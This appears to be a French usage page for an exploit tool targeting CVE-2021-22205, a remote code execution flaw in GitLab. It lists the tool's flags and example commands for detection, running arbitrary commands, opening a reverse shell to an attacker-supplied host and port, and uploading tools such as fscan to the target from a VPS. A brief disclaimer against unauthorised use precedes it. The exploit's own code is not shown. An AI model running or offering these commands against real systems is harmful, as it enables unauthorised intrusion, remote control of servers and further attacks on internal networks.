
CVE-2021-22205 RCE
Outil CVE-2021-22205 RCE, réservé uniquement au partage et à la communication. Ne pas l'utiliser pour des tests non autorisés, sous peine de dégager l'auteur de toute responsabilité.
-R string
VPS pour charger des outils, ex : -R 127.0.0.1:8083
-T string
Nom de l'outil, ex : -T fscan
-c string
Commande à exécuter, ex : -c "id" (par défaut "id")
-host string
Hôte du shell inverse
-m string
Méthode d'utilisation de CVE-2021-22205, ex : -m detect|rce1|rev|upload (par défaut "detect")
-port string
Port du shell inverse
-target string
URL cible (ex : -target https://10.10.10.10) (par défaut "https://10.10.10.10")
Implémente quatre fonctionnalités
Détection DnsLog
-m detect
CVE-2021-22205.exe -target https://10.10.10.10 -m detect
RCE
-m rce1
RCE (Postbin-OOB)
CVE-2021-22205.exe -target https://10.10.10.10 -m rce1 -c whoami
Shell inverse
-m rev
CVE-2021-22205.exe -target https://10.10.10.10 -m rev -host 10.10.10.10 -p 8081
Téléchargement de fichier (http sortant via curl, nécessite un VPS)
-m upload
CVE-2021-22205.exe -target https://10.10.10.10 -m upload -R 127.0.0.1:8083 -T fscan.exe